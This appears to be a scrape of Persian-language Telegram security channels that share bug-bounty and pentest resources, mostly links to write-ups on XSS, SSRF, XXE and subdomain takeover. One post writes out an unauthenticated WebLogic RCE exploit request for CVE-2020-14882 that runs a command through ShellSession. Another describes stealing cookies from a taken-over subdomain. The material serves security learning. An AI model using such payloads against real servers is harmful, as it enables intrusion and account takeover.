Forwarded from امنیت اطلاعات
hacking android apps with frida
https://www.youtube.com/watch?v=iMNs8YAy6pk
#frida
#android
#pentest
@sec_nerd
https://www.youtube.com/watch?v=iMNs8YAy6pk
#frida
#android
#pentest
@sec_nerd
YouTube
Hacking Android Apps with Frida
Recording from Meta's security conference 2020 - Enjoy
Forwarded from امنیت اطلاعات
ورد لیست برای بروت فورس xxe
https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf
#xxe
#pentest
@sec_nerd
https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf
#xxe
#pentest
@sec_nerd
Gist
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder - xxe-payloads.txt
Forwarded from digMeMore (r00t98)
مقاله ای در خصوص باگ بانتی برای دوستانی که تازه وارد این حوزه شدن و نیاز به درک مفاهیم دارن, پیشنهاد میکنم بخونید نکات خوبی داره.
https://medium.com/bountynuggets/understanding-the-bug-bounty-game-bug-bounty-nuggets-65f565273013
#BugBounty
@digmemore
https://medium.com/bountynuggets/understanding-the-bug-bounty-game-bug-bounty-nuggets-65f565273013
#BugBounty
@digmemore
Medium
Understanding the Bug Bounty game — Bug Bounty Nuggets
Bug bounties is an upcoming trend nowadays. Hackers are paid legally to hack companies and getting paid from them. Many newcomers are…
Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
#JS
#BugBounty
#BugBountyTip
@web_priv8
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
#JS
#BugBounty
#BugBountyTip
@web_priv8
Forwarded from امنیت اطلاعات
آسیب پذیری عجیب Tiki Wiki Cms Groupware
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
Forwarded from digMeMore (r00t98)
مجبور کردن فایرفاکس به اجرای XSS در ریدایرکت های 302
https://www.gremwell.com/firefox-xss-302
#XSS
#OpenRedirect
#BugBountyTip
@web_priv8
https://www.gremwell.com/firefox-xss-302
#XSS
#OpenRedirect
#BugBountyTip
@web_priv8
کارهای خفنی که با Open Redirect میشه انجام داد.
https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/
#OpenRedirect
#BugBountyTip
@web_priv8
https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/
#OpenRedirect
#BugBountyTip
@web_priv8
Blog Detectify
The real impact of an Open Redirect vulnerability - Blog Detectify
This article shows when open redirect is considered harmful, it's impact, and how it could lead to attacks like SSRF.
Forwarded from امنیت اطلاعات
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
افزایش سطح دسترسی با تغییر ریسپانس.
https://amiyabehera03.medium.com/a-short-story-of-vertical-privilege-escalation-admin-account-takeover-c943c1711f62
#PrivEsc
#BugBounty
@web_priv8
https://amiyabehera03.medium.com/a-short-story-of-vertical-privilege-escalation-admin-account-takeover-c943c1711f62
#PrivEsc
#BugBounty
@web_priv8
Medium
A Short Story of Vertical Privilege Escalation (Admin Account Takeover)
Hello Guys, Hope all of you are doing well. I am Amiya Behera, an Information Security Analyst in a private organization . also a…
Subdomain Takeover to Authentication bypass
یکی از تٲثیر های تصاحبِ زیردامنه یا Subdomain Takeover مربوط به دزدیدن کوکی های دامین اصلی میشه، برای مثال کوکی های
1- با زبان سمت سرور کوکی رو بگیره، مثلا فایل PHP اپلود کنه رو زیردامنه تصاحب شده.
2- با جاوااسکریپت کوکی رو بگیره، اینجاهم مثل اپلود HTML و بقیه موارد.
مزیت مورد اول نسبت به مورد دوم این هست که دیگه فلگِ HttpOnly اینجا معنی نمیده و هکر حتی با وجود فلگِ HttpOnly میتونه کوکی رو بگیره.
این گزارش دقیقا مثل مورد اوله و یه POC دیگه برا اکسپلویت CORS هم معرفی کرده.
#ATO
#BugBounty
#SubdomainTakeover
@web_priv8
یکی از تٲثیر های تصاحبِ زیردامنه یا Subdomain Takeover مربوط به دزدیدن کوکی های دامین اصلی میشه، برای مثال کوکی های
x.com به دامنه تصاحب شده مثل z.x.com ارسال میشن(طبق RFC 6265)، حالا اینجا POC چیه؟ سادس، هکر برا گرفتن کوکی دوتا راه داره:1- با زبان سمت سرور کوکی رو بگیره، مثلا فایل PHP اپلود کنه رو زیردامنه تصاحب شده.
2- با جاوااسکریپت کوکی رو بگیره، اینجاهم مثل اپلود HTML و بقیه موارد.
مزیت مورد اول نسبت به مورد دوم این هست که دیگه فلگِ HttpOnly اینجا معنی نمیده و هکر حتی با وجود فلگِ HttpOnly میتونه کوکی رو بگیره.
این گزارش دقیقا مثل مورد اوله و یه POC دیگه برا اکسپلویت CORS هم معرفی کرده.
#ATO
#BugBounty
#SubdomainTakeover
@web_priv8
Forwarded from digMeMore (Yasho)
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
باگ ۱۵ میلیون تومانیِ تصاحب حساب کاربری در وباپلیکیشن کافهبازار - مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
مقدمه من و یاشار شاهینزاده در راستای برنامهی باگبانتی کافهبازار آسیبپذیریهای امنیتی مختلفی را شناسایی کردیم. در یکی از آسیبپذیریها، وجود یک مشکل رمزنگاری به دور زدن فرایند احراز هویت (Authentication bypass) در وباپلیکیشن کافهبازار منجر میشد. آسیبپذیری…
31k$ SSRF in Google Cloud Monitoring led to metadata exposure
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#SSRF
#BugBounty
@web_priv8
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#SSRF
#BugBounty
@web_priv8
Blogspot
31k$ SSRF in Google Cloud Monitoring led to metadata exposure
Update 25.01.2021: Added Google engineers exploit method for getting access token. Google Cloud Monitoring (formerly called Stackdriver)...
دیدید بعضی وقت ها یسری XSS هایی که میگیرید قابل اکسپلویت نیست؟ مثل XSS از طریق هدرِ User-Agent یا هدرِ دیگه ای، اینجا محقق یه آسیب پذیری Request Smuggling گرفته و اومده اونو با یه XSS که از طریق هدر اتفاق میفتاده رو ترکیب و اکسپلویت کرده.
https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
#XSS
#Smuggling
#BugBounty
@web_priv8
https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
#XSS
#Smuggling
#BugBounty
@web_priv8